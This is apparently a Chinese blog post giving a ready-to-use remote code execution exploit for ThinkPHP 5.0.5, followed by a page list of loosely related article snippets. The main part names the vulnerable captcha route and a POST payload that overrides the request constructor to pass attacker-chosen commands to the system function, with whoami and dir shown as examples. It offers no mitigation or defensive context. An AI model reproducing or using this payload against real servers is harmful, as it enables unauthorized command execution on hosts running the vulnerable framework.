文章目录

  • 前言
  • 访问
  • payload
  • 示例如下

前言

这里的thinkphp版本为5.0.5

访问

http://xx.xx.xx.xx:8080/index.php/?s=captcha

payload

_method=__construct&filter[]=system&method=GET&get[]=系统命令

示例如下

(1)post传入_method=__construct&filter[]=system&method=GET&get[]=whoami进行命令执行

(2)post传入_method=__construct&filter[]=system&method=GET&get[]=dir进行命令执行

ThinkPHP5.0.5RCE相关推荐

  1. ThinkPHP5.0中Redis的使用和封装(原创)

    Redis是一种常用的非关系型数据库,主要用作数据缓存,数据保存形式为key-value,键值相互映射.它的数据存储跟MySQL不同,它数据存储在内存之中,所以数据读取相对而言很快,用来做高并发非常不 ...

  2. php104.tmp,ThinkPHP5.0多个文件上传后找不到临时文件的修改方法

    这是修改之前的代码 if(!empty($_FILES)){ if(!empty($_FILES[org_positive])){ $org_positive = request()->file ...

  3. ThinkPHP5.0中Redis的使用和封装

    2019独角兽企业重金招聘Python工程师标准>>> Redis是一种常用的非关系型数据库,主要用作数据缓存,数据保存形式为key-value,键值相互映射.它的数据存储跟MySQ ...

  4. thinkphp5.0.9预处理导致的sql注入复现与详细分析

    复现 先搭建thinkphp5.0.9环境 配置下测试环境 然后访问 http://tptest.cc/index.php/index/index/getage?names[0,updatexml(0 ...

  5. Thinkphp5.0快速入门笔记(3)

    学习来源与说明 https://www.kancloud.cn/thinkphp/thinkphp5_quickstart 测试与部署均在windows10下进行学习. 快速入门第三节 获取当前的请求 ...

  6. 修改thinkphp配置nginx服务器,thinkphp5.0配置nginx重写规则

    thinkphp5.0配置nginx重写规则 2018年07月06日 09:29:03阅读数:1529 server { listen 80; #端口号 server_name demo.aa.com ...

  7. 前台模板 海豚php_GitHub - cbw1820446/DolphinPHP: 海豚PHP——快速开发框架(基于ThinkPHP5.0.3)...

    DolphinPHP DophinPHP(海豚PHP)是一个基于ThinkPHP5.0.3开发的一套开源PHP快速开发框架,DophinPHP秉承极简.极速.极致的开发理念,为开发集成了基于数据-角色 ...

  8. php环境搭建sqlserver,ThinkPHP5.0/5.1对接SQLServer数据库(宝塔环境)

    SQLServer实际上是mssql,想要使用thinkphp的Db对象操作数据库前必须要在服务器上安装对应的扩展. 宝塔面板的PHP安装路径为/www/server/php/ 且支持多个PHP版本共 ...

  9. php整合支付宝,Thinkphp5.0整合支付宝在线下单

    thinkphp5.0支付宝在线支付下单整个流程,包括创建订单.支付成功回调更新订单状态.最终跳转到商户订单详情页 查看演示 下载资源: 17 次 下载资源 下载积分: 998 积分 支付宝在线支付控 ...

最新文章

  1. 网吧母盘制作(精华)
  2. mysql 5.5.37 my.cnf,linux安装最新mysql5.5,my.cnf找不到解决办法
  3. VTK:图片之BorderPixelSize
  4. 腾讯AI Lab刘霁谈机器学习,异步计算和去中心化是两大杀器
  5. vue 项目白屏解决方案
  6. 显示控制器注释_欧姆龙可编程控制器CS1D-CPU产品型号说明及功能介绍
  7. ​Java Map中那些巧妙的设计
  8. 戴毅茹同济matlab,Stateflow系统建模(全)解读.pptx
  9. pytorch gather_GCN的简单实现(pytorch)
  10. 新征程 linux下C编程
  11. 第四次黄鹤楼之老照片
  12. 美团架构师带你深入理解Nginx模块开发与架构解析
  13. 计算机课程用的ps是哪个版本,ps哪个版本适用于新手?
  14. 常识:如何从大陆拨打国际长途电话到境外的方法
  15. 海康威视监控摄像头连接电脑教程
  16. [Sensor]LSM6DSL-加速度计、陀螺仪传感器
  17. DayDayUp:计算机技术与软件专业技术资格证书之《系统集成项目管理工程师》课程讲解之项目管理概述、项目管理基本基础知识、项目立项管理相关知识
  18. Axure RP9授权码适合3658版本,亲测可用
  19. 李洪超 硬件工程师_工作六年,如何从 layout 转硬件工程师?丨版主采访(一)...
  20. steam游戏上架流程二:steamworks SDK API steamworks.net 对接 unity

热门文章

  1. vue.js使用例子
  2. 几点建议,让Redis在你的系统中发挥更大作用
  3. 构建scala+IDEA+sbt开发环境
  4. python学习笔记(十四)标准库urllib
  5. Spring Cloud原理详解
  6. Scala学习之特殊符号,及函数
  7. Spark RDD使用详解4--Key-Value型Transformation算子
  8. Spark Java API:Transformation
  9. Spring 框架核心概念IoC 随笔
  10. java.util.concurrent.locks.Lock 接口 源码